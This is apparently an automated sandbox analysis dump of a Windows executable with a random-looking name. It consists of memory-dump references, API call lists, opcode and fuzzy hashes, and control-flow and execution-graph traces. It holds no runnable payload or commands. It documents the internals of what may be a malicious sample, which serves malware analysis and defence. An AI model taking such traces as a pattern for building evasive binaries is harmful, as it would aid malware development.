                                                                                                                                • Associated: 0000001C.00000002.1951201756.00007FF74F589000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951227756.00007FF74F58B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951501503.00007FF74F80A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_28_2_7ff74f580000_vefyedjsvjut.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryVirtualWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3527976591-0
                                                                                                                                • Opcode ID: 44d218f324a4a60e69f590186adc03f2af2ae93ee84cdde52191a9f821aa7650
                                                                                                                                • Instruction ID: c22126f0513125a6f464a363cda9ea72a2cd7e16833e8194d47c8af241956159
                                                                                                                                • Opcode Fuzzy Hash: 44d218f324a4a60e69f590186adc03f2af2ae93ee84cdde52191a9f821aa7650
                                                                                                                                • Instruction Fuzzy Hash: 84F0EC7190CB82D2D614FB51F8500AAFB64FB88380F504435E9AC47725EF3CE0618B60
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001C.00000002.1951171525.00007FF74F581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF74F580000, based on PE: true
                                                                                                                                • Associated: 0000001C.00000002.1951151797.00007FF74F580000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951201756.00007FF74F589000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951227756.00007FF74F58B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951501503.00007FF74F80A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_28_2_7ff74f580000_vefyedjsvjut.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: memset$wcscatwcscpywcslen
                                                                                                                                • String ID: $0$0$@$@
                                                                                                                                • API String ID: 4263182637-1413854666
                                                                                                                                • Opcode ID: d0681a75872366e1df4cc69bc956824748cf368e005ae37a644df1e6bc702fed
                                                                                                                                • Instruction ID: 2d2977007ab541ce25afa2b8fe89a866487fe321071acb6f81822fa868857e1b
                                                                                                                                • Opcode Fuzzy Hash: d0681a75872366e1df4cc69bc956824748cf368e005ae37a644df1e6bc702fed
                                                                                                                                • Instruction Fuzzy Hash: 09B18C3190CAC6C5F321BB18E8553EAF7A0FB85344F801235EA9847AA5DF7DE1A5CB14
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001C.00000002.1951171525.00007FF74F581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF74F580000, based on PE: true
                                                                                                                                • Associated: 0000001C.00000002.1951151797.00007FF74F580000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951201756.00007FF74F589000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951227756.00007FF74F58B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951501503.00007FF74F80A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_28_2_7ff74f580000_vefyedjsvjut.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                                                                                • String ID: 0$X$`
                                                                                                                                • API String ID: 329590056-2527496196
                                                                                                                                • Opcode ID: 73b8facca07f18b68e92b401106acb6fe4b688db2f34678af24554f96c8baf17
                                                                                                                                • Instruction ID: b259b809283d9fd8a221d46eaa4fd58d396e048145bedc4ca5a85095871616ea
                                                                                                                                • Opcode Fuzzy Hash: 73b8facca07f18b68e92b401106acb6fe4b688db2f34678af24554f96c8baf17
                                                                                                                                • Instruction Fuzzy Hash: BA02693290CBC5C5E720AB15E8443EAB7A4FB857A4F814235EAAC47BA5DF3CD195C720
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • VirtualQuery.KERNEL32(?,?,?,?,00007FF74F58A544,00007FF74F58A544,?,?,00007FF74F580000,?,00007FF74F581991), ref: 00007FF74F581C63
                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,00007FF74F58A544,00007FF74F58A544,?,?,00007FF74F580000,?,00007FF74F581991), ref: 00007FF74F581CC7
                                                                                                                                • memcpy.MSVCRT ref: 00007FF74F581CE0
                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00007FF74F58A544,00007FF74F58A544,?,?,00007FF74F580000,?,00007FF74F581991), ref: 00007FF74F581D23
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001C.00000002.1951171525.00007FF74F581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF74F580000, based on PE: true
                                                                                                                                • Associated: 0000001C.00000002.1951151797.00007FF74F580000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951201756.00007FF74F589000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951227756.00007FF74F58B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951501503.00007FF74F80A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_28_2_7ff74f580000_vefyedjsvjut.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                                                • API String ID: 2595394609-2123141913
                                                                                                                                • Opcode ID: 3d18c3b7de528b8c2532974eee19190ff737302e56c317f9bdcb1d1b86b99ac6
                                                                                                                                • Instruction ID: 34fa756afbfd0e9fc9fe1cc998316bd8af0112ca5e39c206104955419bad8857
                                                                                                                                • Opcode Fuzzy Hash: 3d18c3b7de528b8c2532974eee19190ff737302e56c317f9bdcb1d1b86b99ac6
                                                                                                                                • Instruction Fuzzy Hash: 6C417E71A0DA86D5FA10BB55D8446F8E7A0EB44BD4FD54032CD2E8B391DE3CE5A5C720
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001C.00000002.1951171525.00007FF74F581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF74F580000, based on PE: true
                                                                                                                                • Associated: 0000001C.00000002.1951151797.00007FF74F580000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951201756.00007FF74F589000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951227756.00007FF74F58B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951501503.00007FF74F80A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_28_2_7ff74f580000_vefyedjsvjut.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3326252324-0
                                                                                                                                • Opcode ID: bfa330a8e7567c45bb6eeb6004d2cf22d76c654860d4c54795f142723b4c1d99
                                                                                                                                • Instruction ID: d96f227c70e75d8f981066d89ceea5c8ff98dce5f17f44be87cdbd398bffddcf
                                                                                                                                • Opcode Fuzzy Hash: bfa330a8e7567c45bb6eeb6004d2cf22d76c654860d4c54795f142723b4c1d99
                                                                                                                                • Instruction Fuzzy Hash: 5C21EF30A0DA86C5FA15BB11E9443F5E6A4FF50B90FD54071C92E8B6A0DF3CA8A69730
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 642 7ff74f581e10-7ff74f581e2d 643 7ff74f581e3e-7ff74f581e48 642->643 644 7ff74f581e2f-7ff74f581e38 642->644 646 7ff74f581e4a-7ff74f581e53 643->646 647 7ff74f581ea3-7ff74f581ea8 643->647 644->643 645 7ff74f581f60-7ff74f581f69 644->645 648 7ff74f581ecc-7ff74f581ed1 646->648 649 7ff74f581e55-7ff74f581e60 646->649 647->645 650 7ff74f581eae-7ff74f581eb3 647->650 653 7ff74f581f23-7ff74f581f2d 648->653 654 7ff74f581ed3-7ff74f581ee2 signal 648->654 649->647 651 7ff74f581efb-7ff74f581f0a call 7ff74f588990 650->651 652 7ff74f581eb5-7ff74f581eba 650->652 651->653 664 7ff74f581f0c-7ff74f581f10 651->664 652->645 655 7ff74f581ec0 652->655 656 7ff74f581f43-7ff74f581f45 653->656 657 7ff74f581f2f-7ff74f581f3f 653->657 654->653 658 7ff74f581ee4-7ff74f581ee8 654->658 655->653 656->645 663 7ff74f581f5a 657->663 660 7ff74f581f4e-7ff74f581f53 658->660 661 7ff74f581eea-7ff74f581ef9 signal 658->661 660->663 661->645 663->645 665 7ff74f581f55 664->665 666 7ff74f581f12-7ff74f581f21 signal 664->666 665->663 666->645 666->653
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001C.00000002.1951171525.00007FF74F581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF74F580000, based on PE: true
                                                                                                                                • Associated: 0000001C.00000002.1951151797.00007FF74F580000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951201756.00007FF74F589000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951227756.00007FF74F58B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951501503.00007FF74F80A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_28_2_7ff74f580000_vefyedjsvjut.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: CCG
                                                                                                                                • API String ID: 0-1584390748
                                                                                                                                • Opcode ID: f19f7e4d22e570e6dd8561646915369d43160838e68a9c64e1e50922dc2e145a
                                                                                                                                • Instruction ID: c71dcbdf3adea4f4fb38176074992e0fdcfd515dd44a720b2c522b85a2b987dc
                                                                                                                                • Opcode Fuzzy Hash: f19f7e4d22e570e6dd8561646915369d43160838e68a9c64e1e50922dc2e145a
                                                                                                                                • Instruction Fuzzy Hash: 91219A31F0C5C6C2FA75721899803F9D2819F897A5FA58131DA3E473D4DE2CA8E183B1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF74F581247), ref: 00007FF74F5819F9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001C.00000002.1951171525.00007FF74F581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF74F580000, based on PE: true
                                                                                                                                • Associated: 0000001C.00000002.1951151797.00007FF74F580000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951201756.00007FF74F589000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951227756.00007FF74F58B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951501503.00007FF74F80A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_28_2_7ff74f580000_vefyedjsvjut.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                                                                • API String ID: 544645111-395989641
                                                                                                                                • Opcode ID: 6b1457c515752b5b4e62840a941f6cff9dd6a3b0c4a35bab41477e059e1fb52e
                                                                                                                                • Instruction ID: 62bbe9f0c33ca91fbbe578e1d3fa670be06e6945f20a4a96f0259768b30cadf2
                                                                                                                                • Opcode Fuzzy Hash: 6b1457c515752b5b4e62840a941f6cff9dd6a3b0c4a35bab41477e059e1fb52e
                                                                                                                                • Instruction Fuzzy Hash: 34510832A0C9C6DAEB10BB25D8416F8F7A1AB15BA8F844131D92D07795DF3CE5A6C720
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 700 7ff74f581800-7ff74f581810 701 7ff74f581824 700->701 702 7ff74f581812-7ff74f581822 700->702 703 7ff74f58182b-7ff74f581867 call 7ff74f582290 fprintf 701->703 702->703
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001C.00000002.1951171525.00007FF74F581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF74F580000, based on PE: true
                                                                                                                                • Associated: 0000001C.00000002.1951151797.00007FF74F580000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951201756.00007FF74F589000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951227756.00007FF74F58B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951501503.00007FF74F80A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_28_2_7ff74f580000_vefyedjsvjut.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: fprintf
                                                                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                • API String ID: 383729395-3474627141
                                                                                                                                • Opcode ID: 63103e160961b71847a4263c697666ec41891c327a8e8c0011d2add9cd08cfe4
                                                                                                                                • Instruction ID: 9568be3545133c49bb38321b6ac1dc83bd13263f99bb7054259b74b7caab8eb1
                                                                                                                                • Opcode Fuzzy Hash: 63103e160961b71847a4263c697666ec41891c327a8e8c0011d2add9cd08cfe4
                                                                                                                                • Instruction Fuzzy Hash: 1EF0C222E1CAC5C2E610BB24A9410FDE361EB497D1F809231DE9E57251DF2CE1928310
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001C.00000002.1951171525.00007FF74F581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF74F580000, based on PE: true
                                                                                                                                • Associated: 0000001C.00000002.1951151797.00007FF74F580000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951201756.00007FF74F589000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951227756.00007FF74F58B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951501503.00007FF74F80A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_28_2_7ff74f580000_vefyedjsvjut.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 682475483-0
                                                                                                                                • Opcode ID: ec80baa5ded7c444bf3111a5126438c48ddbad04e2109eafd4d1709760d93b29
                                                                                                                                • Instruction ID: 46db8b017b9988e1a4beb8b2f87c56f357c25cd573b664746f160468a5ea5db0
                                                                                                                                • Opcode Fuzzy Hash: ec80baa5ded7c444bf3111a5126438c48ddbad04e2109eafd4d1709760d93b29
                                                                                                                                • Instruction Fuzzy Hash: 3B011A35A0DA82C5F605BB11AD042F4E6A4FF04B90FD64031CA2D87690DF2CA8B28620
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:2.4%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:823
                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                execution_graph 2820 140001ac3 2825 140001a70 2820->2825 2821 140001b36 2824 140001ba0 4 API calls 2821->2824 2822 14000199e 2823 140001a0f 2822->2823 2827 1400019e9 VirtualProtect 2822->2827 2826 140001b53 2824->2826 2825->2821 2825->2822 2825->2826 2827->2822 1995 140001ae4 1997 140001a70 1995->1997 1996 140001b36 2003 140001ba0 1996->2003 1997->1996 1998 14000199e 1997->1998 2001 140001b53 1997->2001 1999 140001a0f 1998->1999 2002 1400019e9 VirtualProtect 1998->2002 2002->1998 2006 140001bc2 2003->2006 2004 140001c04 memcpy 2004->2001 2006->2004 2007 140001c45 VirtualQuery 2006->2007 2008 140001cf4 2006->2008 2007->2008 2012 140001c72 2007->2012 2009 140001d23 GetLastError 2008->2009 2011 140001d37 2009->2011 2010 140001ca4 VirtualProtect 2010->2004 2010->2009 2012->2004 2012->2010 2028 140001404 2101 140001394 2028->2101 2030 140001413 2031 140001394 2 API calls 2030->2031 2032 140001422 2031->2032 2033 140001394 2 API calls 2032->2033 2034 140001431 2033->2034 2035 140001394 2 API calls 2034->2035 2036 140001440 2035->2036 2037 140001394 2 API calls 2036->2037 2038 14000144f 2037->2038 2039 140001394 2 API calls 2038->2039 2040 14000145e 2039->2040 2041 140001394 2 API calls 2040->2041 2042 14000146d 2041->2042 2043 140001394 2 API calls 2042->2043 2044 14000147c 2043->2044 2045 140001394 2 API calls 2044->2045 2046 14000148b 2045->2046 2047 140001394 2 API calls 2046->2047 2048 14000149a 2047->2048 2049 140001394 2 API calls 2048->2049 2050 1400014a9 2049->2050 2051 140001394 2 API calls 2050->2051 2052 1400014b8 2051->2052 2053 140001394 2 API calls 2052->2053 2054 1400014c7 2053->2054 2055 140001394 2 API calls 2054->2055 2056 1400014d6 2055->2056 2057 1400014e5 2056->2057 2058 140001394 2 API calls 2056->2058 2059 140001394 2 API calls 2057->2059 2058->2057 2060 1400014ef 2059->2060 2061 1400014f4 2060->2061 2062 140001394 2 API calls 2060->2062 2063 140001394 2 API calls 2061->2063 2062->2061 2064 1400014fe 2063->2064 2065 140001503 2064->2065 2066 140001394 2 API calls 2064->2066 2067 140001394 2 API calls 2065->2067 2066->2065 2068 14000150d 2067->2068 2069 140001394 2 API calls 2068->2069 2070 140001512 2069->2070 2071 140001394 2 API calls 2070->2071 2072 140001521 2071->2072 2073 140001394 2 API calls 2072->2073 2074 140001530 2073->2074 2075 140001394 2 API calls 2074->2075 2076 14000153f 2075->2076 2077 140001394 2 API calls 2076->2077 2078 14000154e 2077->2078 2079 140001394 2 API calls 2078->2079 2080 14000155d 2079->2080 2081 140001394 2 API calls 2080->2081 2082 14000156c 2081->2082 2083 140001394 2 API calls 2082->2083 2084 14000157b 2083->2084 2085 140001394 2 API calls 2084->2085 2086 14000158a 2085->2086 2087 140001394 2 API calls 2086->2087 2088 140001599 2087->2088 2089 140001394 2 API calls 2088->2089 2090 1400015a8 2089->2090 2091 140001394 2 API calls 2090->2091 2092 1400015b7 2091->2092 2093 140001394 2 API calls 2092->2093 2094 1400015c6 2093->2094 2095 140001394 2 API calls 2094->2095 2096 1400015d5 2095->2096 2097 140001394 2 API calls 2096->2097 2098 1400015e4 2097->2098 2099 140001394 2 API calls 2098->2099 2100 1400015f3 2099->2100 2102 140005ab0 malloc 2101->2102 2103 1400013b8 2102->2103 2104 1400013c6 NtQueryAttributesFile 2103->2104 2104->2030 2105 140002104 2106 140002111 EnterCriticalSection 2105->2106 2107 140002218 2105->2107 2108 14000220b LeaveCriticalSection 2106->2108 2112 14000212e 2106->2112 2109 140002272 2107->2109 2110 140002241 DeleteCriticalSection 2107->2110 2108->2107 2110->2109 2111 14000214d TlsGetValue GetLastError 2111->2112 2112->2108 2112->2111 2013 14000216f 2014 140002185 2013->2014 2015 140002178 InitializeCriticalSection 2013->2015 2015->2014 2016 140001a70 2017 14000199e 2016->2017 2021 140001a7d 2016->2021 2018 140001a0f 2017->2018 2019 1400019e9 VirtualProtect 2017->2019 2019->2017 2020 140001b53 2021->2016 2021->2020 2022 140001b36 2021->2022 2023 140001ba0 4 API calls 2022->2023 2023->2020 2828 140002050 2829 14000205e EnterCriticalSection 2828->2829 2830 1400020cf 2828->2830 2831 1400020c2 LeaveCriticalSection 2829->2831 2832 140002079 2829->2832 2831->2830 2832->2831 2833 140001fd0 2834 140001fe4 2833->2834 2835 140002033 2833->2835 2834->2835 2836 140001ffd EnterCriticalSection LeaveCriticalSection 2834->2836 2836->2835 2121 140001ab3 2122 140001a70 2121->2122 2122->2121 2123 140001b36 2122->2123 2124 14000199e 2122->2124 2127 140001b53 2122->2127 2126 140001ba0 4 API calls 2123->2126 2125 140001a0f 2124->2125 2128 1400019e9 VirtualProtect 2124->2128 2126->2127 2128->2124 1985 140001394 1989 140005ab0 1985->1989 1987 1400013b8 1988 1400013c6 NtQueryAttributesFile 1987->1988 1990 140005ace 1989->1990 1993 140005afb 1989->1993 1990->1987 1991 140005ba3 1992 140005bbf malloc 1991->1992 1994 140005be0 1992->1994 1993->1990 1993->1991 1994->1990 2113 14000219e 2114 140002272 2113->2114 2115 1400021ab EnterCriticalSection 2113->2115 2116 140002265 LeaveCriticalSection 2115->2116 2118 1400021c8 2115->2118 2116->2114 2117 1400021e9 TlsGetValue GetLastError 2117->2118 2118->2116 2118->2117 2024 140001000 2025 14000108b __set_app_type 2024->2025 2026 140001040 2024->2026 2027 1400010b6 2025->2027 2026->2025 2119 140002320 strlen 2120 140002337 2119->2120 2129 140001140 2132 140001160 2129->2132 2131 140001156 2133 1400011b9 2132->2133 2134 14000118b 2132->2134 2135 1400011d3 2133->2135 2136 1400011c7 _amsg_exit 2133->2136 2134->2133 2137 1400011a0 Sleep 2134->2137 2138 140001201 _initterm 2135->2138 2139 14000121a 2135->2139 2136->2135 2137->2133 2137->2134 2138->2139 2155 140001880 2139->2155 2142 14000126a 2143 14000126f malloc 2142->2143 2144 14000128b 2143->2144 2146 1400012d0 2143->2146 2145 1400012a0 strlen malloc memcpy 2144->2145 2145->2145 2145->2146 2166 140003150 2146->2166 2148 140001315 2149 140001344 2148->2149 2150 140001324 2148->2150 2153 140001160 50 API calls 2149->2153 2151 140001338 2150->2151 2152 14000132d _cexit 2150->2152 2151->2131 2152->2151 2154 140001366 2153->2154 2154->2131 2156 140001247 SetUnhandledExceptionFilter 2155->2156 2157 1400018a2 2155->2157 2156->2142 2157->2156 2158 14000194d 2157->2158 2162 140001a20 2157->2162 2159 14000199e 2158->2159 2160 140001ba0 4 API calls 2158->2160 2159->2156 2161 1400019e9 VirtualProtect 2159->2161 2160->2158 2161->2159 2162->2159 2163 140001b53 2162->2163 2164 140001b36 2162->2164 2165 140001ba0 4 API calls 2164->2165 2165->2163 2168 140003166 2166->2168 2167 1400032cb wcslen 2240 14000153f 2167->2240 2168->2167 2171 1400034ce 2171->2148 2177 1400033c6 2178 14000346e wcslen 2177->2178 2179 140003484 2178->2179 2180 1400034cc 2178->2180 2179->2180 2182 1400034b6 wcslen 2179->2182 2181 140003591 wcscpy wcscat 2180->2181 2184 1400035c3 2181->2184 2182->2179 2182->2180 2183 140003613 wcscpy wcscat 2186 140003649 2183->2186 2184->2183 2185 14000375e wcscpy wcscat 2187 140003797 2185->2187 2186->2185 2188 140003afe wcslen 2187->2188 2189 140003b0c 2188->2189 2190 140003b4b 2188->2190 2189->2190 2192 140003b36 wcslen 2189->2192 2191 140003c5a wcscpy wcscat 2190->2191 2194 140003c8f 2191->2194 2192->2189 2192->2190 2193 140003cdf wcscpy wcscat 2196 140003d18 2193->2196 2194->2193 2195 140003d55 wcscpy wcscat 2198 140003d9c 2195->2198 2196->2195 2197 140003dee wcscpy wcscat wcslen 2380 14000146d 2197->2380 2198->2197 2203 140003f05 2466 1400014a9 2203->2466 2204 140004048 2205 14000145e 2 API calls 2204->2205 2212 140003f9c 2205->2212 2208 140004037 2213 14000145e 2 API calls 2208->2213 2209 140005747 2211 1400040da wcscpy wcscat wcslen 2235 1400041b0 2211->2235 2212->2209 2212->2211 2213->2212 2215 140003f90 2217 14000145e 2 API calls 2215->2217 2217->2212 2218 1400042a5 wcslen 2219 14000153f 2 API calls 2218->2219 2219->2235 2220 14000536a memcpy 2220->2235 2221 14000449b wcslen 2627 14000157b 2221->2627 2222 14000470d wcslen 2224 14000153f 2 API calls 2222->2224 2224->2235 2225 14000145e NtQueryAttributesFile malloc 2225->2235 2226 140005001 wcscpy wcscat wcslen 2227 140001422 2 API calls 2226->2227 2227->2235 2229 140004593 wcslen 2644 1400015a8 2229->2644 2232 140005143 2232->2148 2233 1400054cc memcpy 2233->2235 2234 1400026e0 9 API calls 2234->2235 2235->2218 2235->2220 2235->2221 2235->2222 2235->2225 2235->2226 2235->2229 2235->2232 2235->2233 2235->2234 2236 1400051ee wcslen 2235->2236 2238 140004e55 wcscpy wcscat wcslen 2235->2238 2582 1400014d6 2235->2582 2655 140001521 2235->2655 2753 140001431 2235->2753 2237 1400015a8 2 API calls 2236->2237 2237->2235 2684 140001422 2238->2684 2241 140001394 2 API calls 2240->2241 2242 14000154e 2241->2242 2243 140001394 2 API calls 2242->2243 2244 14000155d 2243->2244 2245 140001394 2 API calls 2244->2245 2246 14000156c 2245->2246 2247 140001394 2 API calls 2246->2247 2248 14000157b 2247->2248 2249 140001394 2 API calls 2248->2249 2250 14000158a 2249->2250 2251 140001394 2 API calls 2250->2251 2252 140001599 2251->2252 2253 140001394 2 API calls 2252->2253 2254 1400015a8 2253->2254 2255 140001394 2 API calls 2254->2255 2256 1400015b7 2255->2256 2257 140001394 2 API calls 2256->2257 2258 1400015c6 2257->2258 2259 140001394 2 API calls 2258->2259 2260 1400015d5 2259->2260 2261 140001394 2 API calls 2260->2261 2262 1400015e4 2261->2262 2263 140001394 2 API calls 2262->2263 2264 1400015f3 2263->2264 2264->2171 2265 140001503 2264->2265 2266 140001394 2 API calls 2265->2266 2267 14000150d 2266->2267 2268 140001394 2 API calls 2267->2268 2269 140001512 2268->2269 2270 140001394 2 API calls 2269->2270 2271 140001521 2270->2271 2272 140001394 2 API calls 2271->2272 2273 140001530 2272->2273 2274 140001394 2 API calls 2273->2274 2275 14000153f 2274->2275 2276 140001394 2 API calls 2275->2276 2277 14000154e 2276->2277 2278 140001394 2 API calls 2277->2278 2279 14000155d 2278->2279 2280 140001394 2 API calls 2279->2280 2281 14000156c 2280->2281 2282 140001394 2 API calls 2281->2282 2283 14000157b 2282->2283 2284 140001394 2 API calls 2283->2284 2285 14000158a 2284->2285 2286 140001394 2 API calls 2285->2286 2287 140001599 2286->2287 2288 140001394 2 API calls 2287->2288 2289 1400015a8 2288->2289 2290 140001394 2 API calls 2289->2290 2291 1400015b7 2290->2291 2292 140001394 2 API calls 2291->2292 2293 1400015c6 2292->2293 2294 140001394 2 API calls 2293->2294 2295 1400015d5 2294->2295 2296 140001394 2 API calls 2295->2296 2297 1400015e4 2296->2297 2298 140001394 2 API calls 2297->2298 2299 1400015f3 2298->2299 2299->2177 2300 14000156c 2299->2300 2301 140001394 2 API calls 2300->2301 2302 14000157b 2301->2302 2303 140001394 2 API calls 2302->2303 2304 14000158a 2303->2304 2305 140001394 2 API calls 2304->2305 2306 140001599 2305->2306 2307 140001394 2 API calls 2306->2307 2308 1400015a8 2307->2308 2309 140001394 2 API calls 2308->2309 2310 1400015b7 2309->2310 2311 140001394 2 API calls 2310->2311 2312 1400015c6 2311->2312 2313 140001394 2 API calls 2312->2313 2314 1400015d5 2313->2314 2315 140001394 2 API calls 2314->2315 2316 1400015e4 2315->2316 2317 140001394 2 API calls 2316->2317 2318 1400015f3 2317->2318 2318->2177 2319 14000145e 2318->2319 2320 140001394 2 API calls 2319->2320 2321 14000146d 2320->2321 2322 140001394 2 API calls 2321->2322 2323 14000147c 2322->2323 2324 140001394 2 API calls 2323->2324 2325 14000148b 2324->2325 2326 140001394 2 API calls 2325->2326 2327 14000149a 2326->2327 2328 140001394 2 API calls 2327->2328 2329 1400014a9 2328->2329 2330 140001394 2 API calls 2329->2330 2331 1400014b8 2330->2331 2332 140001394 2 API calls 2331->2332 2333 1400014c7 2332->2333 2334 140001394 2 API calls 2333->2334 2335 1400014d6 2334->2335 2336 1400014e5 2335->2336 2337 140001394 2 API calls 2335->2337 2338 140001394 2 API calls 2336->2338 2337->2336 2339 1400014ef 2338->2339 2340 1400014f4 2339->2340 2341 140001394 2 API calls 2339->2341 2342 140001394 2 API calls 2340->2342 2341->2340 2343 1400014fe 2342->2343 